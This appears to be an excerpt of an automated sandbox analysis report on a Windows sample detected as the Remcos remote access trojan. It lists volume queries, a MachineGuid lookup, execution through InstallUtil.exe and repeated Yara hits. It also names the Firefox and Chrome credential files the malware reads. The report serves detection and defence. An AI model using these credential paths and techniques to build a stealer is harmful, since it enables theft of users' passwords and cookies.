Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Users\user\Desktop\kyFBQxVbsg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00431590 cpuid

17_2_00431590

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00404F28 GetLocalTime,CreateEventA,CreateThread,

17_2_00404F28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_004451D0 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

17_2_004451D0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00417E20 GetComputerNameExW,GetUserNameW,

17_2_00417E20

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: \key3.db		17_2_0040A1C4

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

17_2_0040A0A6

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
